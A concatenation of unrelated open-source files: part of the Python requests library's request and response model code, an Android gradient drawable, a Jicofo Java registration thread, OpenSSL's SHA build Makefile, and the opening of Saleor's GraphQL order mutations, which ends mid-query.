# handles RFC 3986 only.
if ':' in url and not url.lower().startswith('http'):
self.url = url
return
# Support for unicode domain names and paths.
try:
scheme, auth, host, port, path, query, fragment = parse_url(url)
except LocationParseError as e:
raise InvalidURL(*e.args)
if not scheme:
error = ("Invalid URL {0!r}: No schema supplied. Perhaps you meant http://{0}?")
error = error.format(to_native_string(url, 'utf8'))
raise MissingSchema(error)
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
# Only want to apply IDNA to the hostname
try:
host = host.encode('idna').decode('utf-8')
except UnicodeError:
raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
if netloc:
netloc += '@'
netloc += host
if port:
netloc += ':' + str(port)
# Bare domains aren't valid URLs.
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
enc_params = self._encode_params(params)
if enc_params:
if query:
query = '%s&%s' % (query, enc_params)
else:
query = enc_params
url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
self.url = url
def prepare_headers(self, headers):
"""Prepares the given HTTP headers."""
if headers:
self.headers = CaseInsensitiveDict((to_native_string(name), value) for name, value in headers.items())
else:
self.headers = CaseInsensitiveDict()
def prepare_body(self, data, files, json=None):
"""Prepares the given HTTP body data."""
# Check if file, fo, generator, iterator.
# If not, run through normal process.
# Nottin' on you.
body = None
content_type = None
length = None
if json is not None:
content_type = 'application/json'
body = complexjson.dumps(json)
is_stream = all([
hasattr(data, '__iter__'),
not isinstance(data, (basestring, list, tuple, dict))
])
try:
length = super_len(data)
except (TypeError, AttributeError, UnsupportedOperation):
length = None
if is_stream:
body = data
if files:
raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
if length is not None:
self.headers['Content-Length'] = builtin_str(length)
else:
self.headers['Transfer-Encoding'] = 'chunked'
else:
# Multi-part file uploads.
if files:
(body, content_type) = self._encode_files(files, data)
else:
if data and json is None:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
self.prepare_content_length(body)
# Add content-type if it wasn't explicitly provided.
if content_type and ('content-type' not in self.headers):
self.headers['Content-Type'] = content_type
self.body = body
def prepare_content_length(self, body):
if hasattr(body, 'seek') and hasattr(body, 'tell'):
body.seek(0, 2)
self.headers['Content-Length'] = builtin_str(body.tell())
body.seek(0, 0)
elif body is not None:
l = super_len(body)
if l:
self.headers['Content-Length'] = builtin_str(l)
elif (self.method not in ('GET', 'HEAD')) and (self.headers.get('Content-Length') is None):
self.headers['Content-Length'] = '0'
def prepare_auth(self, auth, url=''):
"""Prepares the given HTTP auth data."""
# If no Auth is explicitly provided, extract it from the URL first.
if auth is None:
url_auth = get_auth_from_url(self.url)
auth = url_auth if any(url_auth) else None
if auth:
if isinstance(auth, tuple) and len(auth) == 2:
# special-case basic HTTP auth
auth = HTTPBasicAuth(*auth)
# Allow auth to make its changes.
r = auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Recompute Content-Length
self.prepare_content_length(self.body)
def prepare_cookies(self, cookies):
"""Prepares the given HTTP cookie data.
This function eventually generates a ``Cookie`` header from the
given cookies using cookielib. Due to cookielib's design, the header
will not be regenerated if it already exists, meaning this function
can only be called once for the life of the
:class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
header is removed beforehand."""
if isinstance(cookies, cookielib.CookieJar):
self._cookies = cookies
else:
self._cookies = cookiejar_from_dict(cookies)
cookie_header = get_cookie_header(self._cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
def prepare_hooks(self, hooks):
"""Prepares the given hooks."""
# hooks can be passed as None to the prepare method and to this
# method. To prevent iterating over None, simply use an empty list
# if hooks is False-y
hooks = hooks or []
for event in hooks:
self.register_hook(event, hooks[event])
class Response(object):
"""The :class:`Response <Response>` object, which contains a
server's response to an HTTP request.
"""
__attrs__ = [
'_content', 'status_code', 'headers', 'url', 'history',
'encoding', 'reason', 'cookies', 'elapsed', 'request'
]
def __init__(self):
super(Response, self).__init__()
self._content = False
self._content_consumed = False
#: Integer Code of responded HTTP Status, e.g. 404 or 200.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
#: Use of ``raw`` requires that ``stream=True`` be set on the request.
# This requirement does not apply for use internally to Requests.
self.raw = None
#: Final URL location of Response.
self.url = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here. The list is sorted from the oldest to the most recent request.
self.history = []
#: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
self.reason = None
#: A CookieJar of Cookies the server sent back.
self.cookies = cookiejar_from_dict({})
#: The amount of time elapsed between sending the request
#: and the arrival of the response (as a timedelta).
#: This property specifically measures the time taken between sending
#: the first byte of the request and finishing parsing the headers. It
#: is therefore unaffected by consuming the response content or the
#: value of the ``stream`` keyword argument.
self.elapsed = datetime.timedelta(0)
#: The :class:`PreparedRequest <PreparedRequest>` object to which this
#: is a response.
self.request = None
def __getstate__(self):
# Consume everything; accessing the content attribute makes
# sure the content has been fully read.
if not self._content_consumed:
self.content
return dict(
(attr, getattr(self, attr, None))
for attr in self.__attrs__
)
def __setstate__(self, state):
for name, value in state.items():
setattr(self, name, value)
# pickled objects do not have .raw
setattr(self, '_content_consumed', True)
setattr(self, 'raw', None)
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __nonzero__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __iter__(self):
"""Allows you to use a response as an iterator."""
return self.iter_content(128)
@property
def ok(self):
try:
self.raise_for_status()
except HTTPError:
return False
return True
@property
def is_redirect(self):
"""True if this Response is a well-formed HTTP redirect that could have
been processed automatically (by :meth:`Session.resolve_redirects`).
"""
return ('location' in self.headers and self.status_code in REDIRECT_STATI)
@property
def is_permanent_redirect(self):
"""True if this Response one of the permanant versions of redirect"""
return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
@property
def apparent_encoding(self):
"""The apparent encoding, provided by the chardet library"""
return chardet.detect(self.content)['encoding']
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. When stream=True is set on the
request, this avoids reading the content at once into memory for
large responses. The chunk size is the number of bytes it should
read into memory. This is not necessarily the length of each item
returned as decoding can take place.
If decode_unicode is True, content will be decoded using the best
available encoding based on the response.
"""
def generate():
# Special case for urllib3.
if hasattr(self.raw, 'stream'):
try:
for chunk in self.raw.stream(chunk_size, decode_content=True):
yield chunk
except ProtocolError as e:
raise ChunkedEncodingError(e)
except DecodeError as e:
raise ContentDecodingError(e)
except ReadTimeoutError as e:
raise ConnectionError(e)
else:
# Standard file-like object.
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
if self._content_consumed and isinstance(self._content, bool):
raise StreamConsumedError()
# simulate reading small chunks of the content
reused_chunks = iter_slices(self._content, chunk_size)
stream_chunks = generate()
chunks = reused_chunks if self._content_consumed else stream_chunks
if decode_unicode:
chunks = stream_decode_response_unicode(chunks, self)
return chunks
def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
if delimiter:
lines = chunk.split(delimiter)
else:
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
try:
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code == 0:
self._content = None
else:
self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
except AttributeError:
self._content = None
self._content_consumed = True
# don't need to release the connection; that's been handled by urllib3
# since we exhausted the data.
return self._content
@property
def text(self):
"""Content of the response, in unicode.
If Response.encoding is None, encoding will be guessed using
``chardet``.
The encoding of the response content is determined based solely on HTTP
headers, following RFC 2616 to the letter. If you can take advantage of
non-HTTP knowledge to make a better guess at the encoding, you should
set ``r.encoding`` appropriately before accessing this property.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
encoding = self.apparent_encoding
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except (LookupError, TypeError):
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# A TypeError can be raised if encoding is None
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
def json(self, **kwargs):
"""Returns the json-encoded content of a response, if any.
:param \*\*kwargs: Optional arguments that ``json.loads`` takes.
"""
if not self.encoding and len(self.content) > 3:
# No encoding set. JSON RFC 4627 section 3 states we should expect
# UTF-8, -16 or -32. Detect which one to use; If the detection or
# decoding fails, fall back to `self.text` (using chardet to make
# a best guess).
encoding = guess_json_utf(self.content)
if encoding is not None:
try:
return complexjson.loads(
self.content.decode(encoding), **kwargs
)
except UnicodeDecodeError:
# Wrong UTF codec detected; usually because it's not UTF-8
# but some other 8-bit codec. This is an RFC violation,
# and the server didn't bother to tell us what codec *was*
# used.
pass
return complexjson.loads(self.text, **kwargs)
@property
def links(self):
"""Returns the parsed header links of the response, if any."""
header = self.headers.get('link')
# l = MultiDict()
l = {}
if header:
links = parse_header_links(header)
for link in links:
key = link.get('rel') or link.get('url')
l[key] = link
return l
def raise_for_status(self):
"""Raises stored :class:`HTTPError`, if one occurred."""
http_error_msg = ''
if 400 <= self.status_code < 500:
http_error_msg = '%s Client Error: %s for url: %s' % (self.status_code, self.reason, self.url)
elif 500 <= self.status_code < 600:
http_error_msg = '%s Server Error: %s for url: %s' % (self.status_code, self.reason, self.url)
if http_error_msg:
raise HTTPError(http_error_msg, response=self)
def close(self):
"""Releases the connection back to the pool. Once this method has been
called the underlying ``raw`` object must not be accessed again.
*Note: Should not normally need to be called explicitly.*
"""
if not self._content_consumed:
return self.raw.close()
return self.raw.release_conn()
| {
"pile_set_name": "Github"
} |
<shape xmlns:android="http://schemas.android.com/apk/res/android"
android:shape="rectangle">
<gradient
android:angle="0"
android:endColor="#fe6446"
android:startColor="#fe9150"
android:type="linear" />
</shape> | {
"pile_set_name": "Github"
} |
/*
* Jicofo, the Jitsi Conference Focus.
*
* Copyright @ 2015 Atlassian Pty Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jitsi.jicofo.util;
import net.java.sip.communicator.service.protocol.*;
import org.jitsi.utils.logging.*;
/**
* Thread does the job of registering given <tt>ProtocolProviderService</tt>.
*
* @author Pawel Domas
*/
public class RegisterThread
extends Thread
{
/**
* The logger.
*/
private final static Logger logger
= Logger.getLogger(RegisterThread.class);
private final ProtocolProviderService pps;
public RegisterThread(ProtocolProviderService pps)
{
this.pps = pps;
}
@Override
public void run()
{
try
{
pps.register(new ServerSecurityAuthority());
}
catch (OperationFailedException e)
{
logger.error(e, e);
}
}
}
| {
"pile_set_name": "Github"
} |
#
# OpenSSL/crypto/sha/Makefile
#
DIR= sha
TOP= ../..
CC= cc
CPP= $(CC) -E
INCLUDES=
CFLAG=-g
MAKEFILE= Makefile
AR= ar r
SHA1_ASM_OBJ=
CFLAGS= $(INCLUDES) $(CFLAG)
ASFLAGS= $(INCLUDES) $(ASFLAG)
AFLAGS= $(ASFLAGS)
GENERAL=Makefile
TEST=shatest.c sha1test.c sha256t.c sha512t.c
APPS=
LIB=$(TOP)/libcrypto.a
LIBSRC=sha_dgst.c sha1dgst.c sha_one.c sha1_one.c sha256.c sha512.c
LIBOBJ=sha_dgst.o sha1dgst.o sha_one.o sha1_one.o sha256.o sha512.o $(SHA1_ASM_OBJ)
SRC= $(LIBSRC)
EXHEADER= sha.h
HEADER= sha_locl.h $(EXHEADER)
ALL= $(GENERAL) $(SRC) $(HEADER)
top:
(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
all: lib
lib: $(LIBOBJ)
$(AR) $(LIB) $(LIBOBJ)
$(RANLIB) $(LIB) || echo Never mind.
@touch lib
sha1-586.s: asm/sha1-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha1-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha256-586.s: asm/sha256-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha256-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha512-586.s: asm/sha512-586.pl ../perlasm/x86asm.pl
$(PERL) asm/sha512-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
sha1-ia64.s: asm/sha1-ia64.pl
(cd asm; $(PERL) sha1-ia64.pl ../$@ $(CFLAGS))
sha256-ia64.s: asm/sha512-ia64.pl
(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
sha512-ia64.s: asm/sha512-ia64.pl
(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
sha256-armv4.S: asm/sha256-armv4.pl
$(PERL) $< $(PERLASM_SCHEME) $@
sha1-alpha.s: asm/sha1-alpha.pl
([email protected]; trap "rm $$preproc" INT; \
$(PERL) asm/sha1-alpha.pl > $$preproc && \
$(CC) -E -P $$preproc > $@ && rm $$preproc)
# Solaris make has to be explicitly told
sha1-x86_64.s: asm/sha1-x86_64.pl; $(PERL) asm/sha1-x86_64.pl $(PERLASM_SCHEME) > $@
sha1-mb-x86_64.s: asm/sha1-mb-x86_64.pl; $(PERL) asm/sha1-mb-x86_64.pl $(PERLASM_SCHEME) > $@
sha256-x86_64.s:asm/sha512-x86_64.pl; $(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
sha256-mb-x86_64.s: asm/sha256-mb-x86_64.pl; $(PERL) asm/sha256-mb-x86_64.pl $(PERLASM_SCHEME) > $@
sha512-x86_64.s:asm/sha512-x86_64.pl; $(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
sha1-sparcv9.S: asm/sha1-sparcv9.pl; $(PERL) asm/sha1-sparcv9.pl $@ $(CFLAGS)
sha256-sparcv9.S:asm/sha512-sparcv9.pl; $(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
sha512-sparcv9.S:asm/sha512-sparcv9.pl; $(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
sha1-ppc.s: asm/sha1-ppc.pl; $(PERL) asm/sha1-ppc.pl $(PERLASM_SCHEME) $@
sha256-ppc.s: asm/sha512-ppc.pl; $(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
sha512-ppc.s: asm/sha512-ppc.pl; $(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
sha256p8-ppc.s: asm/sha512p8-ppc.pl; $(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
sha512p8-ppc.s: asm/sha512p8-ppc.pl; $(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
sha1-parisc.s: asm/sha1-parisc.pl; $(PERL) asm/sha1-parisc.pl $(PERLASM_SCHEME) $@
sha256-parisc.s:asm/sha512-parisc.pl; $(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
sha512-parisc.s:asm/sha512-parisc.pl; $(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
sha1-mips.S: asm/sha1-mips.pl; $(PERL) asm/sha1-mips.pl $(PERLASM_SCHEME) $@
sha256-mips.S: asm/sha512-mips.pl; $(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
sha512-mips.S: asm/sha512-mips.pl; $(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
# GNU make "catch all"
sha1-%.S: asm/sha1-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha256-%.S: asm/sha512-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha512-%.S: asm/sha512-%.pl; $(PERL) $< $(PERLASM_SCHEME) $@
sha1-armv4-large.o: sha1-armv4-large.S
sha256-armv4.o: sha256-armv4.S
sha512-armv4.o: sha512-armv4.S
sha1-armv8.o: sha1-armv8.S
sha256-armv8.o: sha256-armv8.S
sha512-armv8.o: sha512-armv8.S
files:
$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
links:
@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
install:
@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
do \
(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
done;
tags:
ctags $(SRC)
tests:
lint:
lint -DLINT $(INCLUDES) $(SRC)>fluff
update: depend
depend:
@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
dclean:
$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
mv -f Makefile.new $(MAKEFILE)
clean:
rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
# DO NOT DELETE THIS LINE -- make depend depends on it.
sha1_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha1_one.o: ../../include/openssl/opensslconf.h
sha1_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha1_one.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha1_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha1_one.o: sha1_one.c
sha1dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha1dgst.o: ../../include/openssl/opensslconf.h
sha1dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha1dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha1dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha1dgst.o: ../md32_common.h sha1dgst.c sha_locl.h
sha256.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha256.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
sha256.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
sha256.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
sha256.o: ../../include/openssl/symhacks.h ../md32_common.h sha256.c
sha512.o: ../../e_os.h ../../include/openssl/bio.h
sha512.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
sha512.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
sha512.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
sha512.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha512.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha512.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha512.o: ../cryptlib.h sha512.c
sha_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha_dgst.o: ../../include/openssl/opensslconf.h
sha_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
sha_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
sha_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
sha_dgst.o: ../md32_common.h sha_dgst.c sha_locl.h
sha_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
sha_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
sha_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
sha_one.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
sha_one.o: ../../include/openssl/symhacks.h sha_one.c
| {
"pile_set_name": "Github"
} |
import {
invoiceErrorFragment,
orderErrorFragment
} from "@saleor/fragments/errors";
import {
fragmentOrderDetails,
fragmentOrderEvent,
invoiceFragment
} from "@saleor/fragments/orders";
import makeMutation from "@saleor/hooks/makeMutation";
import gql from "graphql-tag";
import { TypedMutation } from "../mutations";
import { FulfillOrder, FulfillOrderVariables } from "./types/FulfillOrder";
import {
InvoiceEmailSend,
InvoiceEmailSendVariables
} from "./types/InvoiceEmailSend";
import {
InvoiceRequest,
InvoiceRequestVariables
} from "./types/InvoiceRequest";
import { OrderAddNote, OrderAddNoteVariables } from "./types/OrderAddNote";
import { OrderCancel, OrderCancelVariables } from "./types/OrderCancel";
import { OrderCapture, OrderCaptureVariables } from "./types/OrderCapture";
import {
OrderDraftBulkCancel,
OrderDraftBulkCancelVariables
} from "./types/OrderDraftBulkCancel";
import {
OrderDraftCancel,
OrderDraftCancelVariables
} from "./types/OrderDraftCancel";
import { OrderDraftCreate } from "./types/OrderDraftCreate";
import {
OrderDraftFinalize,
OrderDraftFinalizeVariables
} from "./types/OrderDraftFinalize";
import {
OrderDraftUpdate,
OrderDraftUpdateVariables
} from "./types/OrderDraftUpdate";
import {
OrderFulfillmentCancel,
OrderFulfillmentCancelVariables
} from "./types/OrderFulfillmentCancel";
import {
OrderFulfillmentUpdateTracking,
OrderFulfillmentUpdateTrackingVariables
} from "./types/OrderFulfillmentUpdateTracking";
import {
OrderLineDelete,
OrderLineDeleteVariables
} from "./types/OrderLineDelete";
import { OrderLinesAdd, OrderLinesAddVariables } from "./types/OrderLinesAdd";
import {
OrderLineUpdate,
OrderLineUpdateVariables
} from "./types/OrderLineUpdate";
import {
OrderMarkAsPaid,
OrderMarkAsPaidVariables
} from "./types/OrderMarkAsPaid";
import { OrderRefund, OrderRefundVariables } from "./types/OrderRefund";
import {
OrderShippingMethodUpdate,
OrderShippingMethodUpdateVariables
} from "./types/OrderShippingMethodUpdate";
import { OrderUpdate, OrderUpdateVariables } from "./types/OrderUpdate";
import { OrderVoid, OrderVoidVariables } from "./types/OrderVoid";
const orderCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderCancel($id: ID!) {
orderCancel(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderCancelMutation = TypedMutation<
OrderCancel,
OrderCancelVariables
>(orderCancelMutation);
const orderDraftCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftCancel($id: ID!) {
draftOrderDelete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderDraftCancelMutation = TypedMutation<
OrderDraftCancel,
OrderDraftCancelVariables
>(orderDraftCancelMutation);
const orderDraftBulkCancelMutation = gql`
${orderErrorFragment}
mutation OrderDraftBulkCancel($ids: [ID]!) {
draftOrderBulkDelete(ids: $ids) {
errors: orderErrors {
...OrderErrorFragment
}
}
}
`;
export const TypedOrderDraftBulkCancelMutation = TypedMutation<
OrderDraftBulkCancel,
OrderDraftBulkCancelVariables
>(orderDraftBulkCancelMutation);
const orderDraftFinalizeMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftFinalize($id: ID!) {
draftOrderComplete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderDraftFinalizeMutation = TypedMutation<
OrderDraftFinalize,
OrderDraftFinalizeVariables
>(orderDraftFinalizeMutation);
const orderRefundMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderRefund($id: ID!, $amount: PositiveDecimal!) {
orderRefund(id: $id, amount: $amount) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderRefundMutation = TypedMutation<
OrderRefund,
OrderRefundVariables
>(orderRefundMutation);
const orderVoidMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderVoid($id: ID!) {
orderVoid(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderVoidMutation = TypedMutation<
OrderVoid,
OrderVoidVariables
>(orderVoidMutation);
const orderMarkAsPaidMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderMarkAsPaid($id: ID!) {
orderMarkAsPaid(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderMarkAsPaidMutation = TypedMutation<
OrderMarkAsPaid,
OrderMarkAsPaidVariables
>(orderMarkAsPaidMutation);
const orderCaptureMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderCapture($id: ID!, $amount: PositiveDecimal!) {
orderCapture(id: $id, amount: $amount) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderCaptureMutation = TypedMutation<
OrderCapture,
OrderCaptureVariables
>(orderCaptureMutation);
const orderFulfillmentUpdateTrackingMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderFulfillmentUpdateTracking(
$id: ID!
$input: FulfillmentUpdateTrackingInput!
) {
orderFulfillmentUpdateTracking(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderFulfillmentUpdateTrackingMutation = TypedMutation<
OrderFulfillmentUpdateTracking,
OrderFulfillmentUpdateTrackingVariables
>(orderFulfillmentUpdateTrackingMutation);
const orderFulfillmentCancelMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderFulfillmentCancel($id: ID!, $input: FulfillmentCancelInput!) {
orderFulfillmentCancel(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderFulfillmentCancelMutation = TypedMutation<
OrderFulfillmentCancel,
OrderFulfillmentCancelVariables
>(orderFulfillmentCancelMutation);
const orderAddNoteMutation = gql`
${fragmentOrderEvent}
${orderErrorFragment}
mutation OrderAddNote($order: ID!, $input: OrderAddNoteInput!) {
orderAddNote(order: $order, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
id
events {
...OrderEventFragment
}
}
}
}
`;
export const TypedOrderAddNoteMutation = TypedMutation<
OrderAddNote,
OrderAddNoteVariables
>(orderAddNoteMutation);
const orderUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderUpdate($id: ID!, $input: OrderUpdateInput!) {
orderUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderUpdateMutation = TypedMutation<
OrderUpdate,
OrderUpdateVariables
>(orderUpdateMutation);
const orderDraftUpdateMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderDraftUpdate($id: ID!, $input: DraftOrderInput!) {
draftOrderUpdate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderDraftUpdateMutation = TypedMutation<
OrderDraftUpdate,
OrderDraftUpdateVariables
>(orderDraftUpdateMutation);
const orderShippingMethodUpdateMutation = gql`
${orderErrorFragment}
mutation OrderShippingMethodUpdate(
$id: ID!
$input: OrderUpdateShippingInput!
) {
orderUpdateShipping(order: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
availableShippingMethods {
id
name
}
id
shippingMethod {
id
name
price {
amount
currency
}
}
shippingMethodName
shippingPrice {
gross {
amount
currency
}
}
}
}
}
`;
export const TypedOrderShippingMethodUpdateMutation = TypedMutation<
OrderShippingMethodUpdate,
OrderShippingMethodUpdateVariables
>(orderShippingMethodUpdateMutation);
const orderDraftCreateMutation = gql`
${orderErrorFragment}
mutation OrderDraftCreate {
draftOrderCreate(input: {}) {
errors: orderErrors {
...OrderErrorFragment
}
order {
id
}
}
}
`;
export const useOrderDraftCreateMutation = makeMutation<OrderDraftCreate, {}>(
orderDraftCreateMutation
);
const orderLineDeleteMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLineDelete($id: ID!) {
draftOrderLineDelete(id: $id) {
errors: orderErrors {
...OrderErrorFragment
}
order {
...OrderDetailsFragment
}
}
}
`;
export const TypedOrderLineDeleteMutation = TypedMutation<
OrderLineDelete,
OrderLineDeleteVariables
>(orderLineDeleteMutation);
const orderLinesAddMutation = gql`
${fragmentOrderDetails}
${orderErrorFragment}
mutation OrderLinesAdd($id: ID!, $input: [OrderLineCreateInput]!) {
draftOrderLinesCreate(id: $id, input: $input) {
errors: orderErrors {
...OrderErrorFragment
}
order {
